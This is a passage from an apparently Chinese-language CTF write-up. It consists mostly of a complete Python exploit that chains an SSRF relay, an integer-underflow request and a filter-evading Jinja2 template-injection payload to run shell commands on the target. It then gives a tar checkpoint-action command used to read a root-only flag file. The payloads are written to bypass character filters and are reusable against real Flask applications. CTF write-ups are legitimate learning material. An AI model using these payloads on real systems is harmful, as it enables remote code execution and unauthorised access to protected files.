'{%set im=ud~ud~(dict(im=1,port=1)|join)~ud~ud%}', # 构造 __import__
'{%set xx=dict(o=1,s=1)|join%}', # 构造 os
'{%set omod=bd|attr(gi)(im)(xx)%}', # 执行 __import__('os')
'{%set po=dict(po=1,pen=1)|join%}', # 构造 popen
'{%set cr=dict(chr=1)|join%}', # 构造 chr
'{%set CF=bd|attr(gi)(cr)%}', # 获取 chr 函数
]

最后的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
import requests
import urllib.parse
import re


TARGET = "http://45.40.247.139:27418"
s = requests.Session()

def relay_raw(raw_http):
try:
r = s.post(f"{TARGET}/relay", data={"port": "5000", "data": raw_http}, timeout=10)
return r.text
except Exception as e:
return str(e)

def extract_cookie(resp):
m = re.search(r'Set-Cookie: session=([^;]+)', resp)
return m.group(1) if m else None

def setup_credits():
# 1. 初始化 Session
resp = relay_raw("GET /initialize HTTP/1.1\r\nHost: 127.0.0.1:5000\r\nConnection: close\r\n\r\n")
cookie = extract_cookie(resp)

# 2. 触发 NumPy 整数下溢获取巨额积分
hack_req = (f"GET /hack?amount=-9223372036854775808 HTTP/1.1\r\n"
f"Host: 127.0.0.1:5000\r\n"
f"Cookie: session={cookie}\r\n"
"Connection: close\r\n\r\n")
resp = relay_raw(hack_req)
return extract_cookie(resp) or cookie

def build_payload(cmd):
# 严格遵循你的“无点、无下划线、无引号”构造逻辑
parts = [
'{%set ud=lipsum|string|batch(19)|first|last%}', # 获取下划线 _
'{%set gl=ud~ud~(dict(glob=1,als=1)|join)~ud~ud%}', # 构造 __globals__
'{%set gi=dict(g=1,e=2,t=3)|join%}', # 构造 get (代替复杂的 getitem)
'{%set gd=lipsum|attr(gl)%}', # 获取 globals 字典
'{%set bi=ud~ud~(dict(built=1,ins=1)|join)~ud~ud%}', # 构造 __builtins__
'{%set bd=gd|attr(gi)(bi)%}', # 获取 builtins
'{%set im=ud~ud~(dict(im=1,port=1)|join)~ud~ud%}', # 构造 __import__
'{%set xx=dict(o=1,s=1)|join%}', # 构造 os
'{%set omod=bd|attr(gi)(im)(xx)%}', # 执行 __import__('os')
'{%set po=dict(po=1,pen=1)|join%}', # 构造 popen
'{%set cr=dict(chr=1)|join%}', # 构造 chr
'{%set CF=bd|attr(gi)(cr)%}', # 获取 chr 函数
]

# 将命令 ls / 转换为 chr() 拼接形式,彻底避开空格和斜杠过滤
cmd_expr = '~'.join([f'CF({ord(c)})' for c in cmd])
parts.append('{%set cmd=' + cmd_expr + '%}')

# 执行并打印回显
# omod.popen(cmd).read()
parts.append('{%print(omod|attr(po)(cmd)|attr(dict(re=1,ad=1)|join)())%}')
return ''.join(parts)

def execute(cmd):
print(f"[*] 正在尝试执行命令: {cmd}")
cookie = setup_credits()
payload = build_payload(cmd)

# 构造原始 POST 报文通过 SSRF 发送
body = f"fragment={urllib.parse.quote(payload)}"
raw = (f"POST /market HTTP/1.1\r\n"
f"Host: 127.0.0.1:5000\r\n"
f"Cookie: session={cookie}\r\n"
f"Content-Type: application/x-www-form-urlencoded\r\n"
f"Content-Length: {len(body)}\r\n"
"Connection: close\r\n\r\n"
f"{body}")

resp = relay_raw(raw)

# 清理响应,提取 <h3> 标签中的回显结果
if "<h3>" in resp:
output = resp.split("<h3>")[1].split("</h3>")[0]
return output.strip()
return resp

if __name__ == "__main__":
# 执行 ls -la / 以查看详细根目录文件列表
result = execute("ls -la /")
print("\n[+] 执行回显:")
print("-" * 40)
print(result)
print("-" * 40)

最后就是rce了,

image-20260310190436473

image-20260310191047743

这里看到flag仅root可读,但是现在不是root权限,需要进行提取。

image-20260310191750627

用tar提取读flag,paylaod

1
/usr/bin/tar --checkpoint=1 --checkpoint-action=exec='tar cf - /flag | tar xf - --to-stdout' -cf /dev/null /tmp/dummyfile

image-20260310192133714

赛后写第三题的时候靶机直接关了,跟比赛方说了也没解决,我不理解。难道说,,,,

结语

就这吧,看个几个公众号文章槽点都差不多但是题目还是很不错的。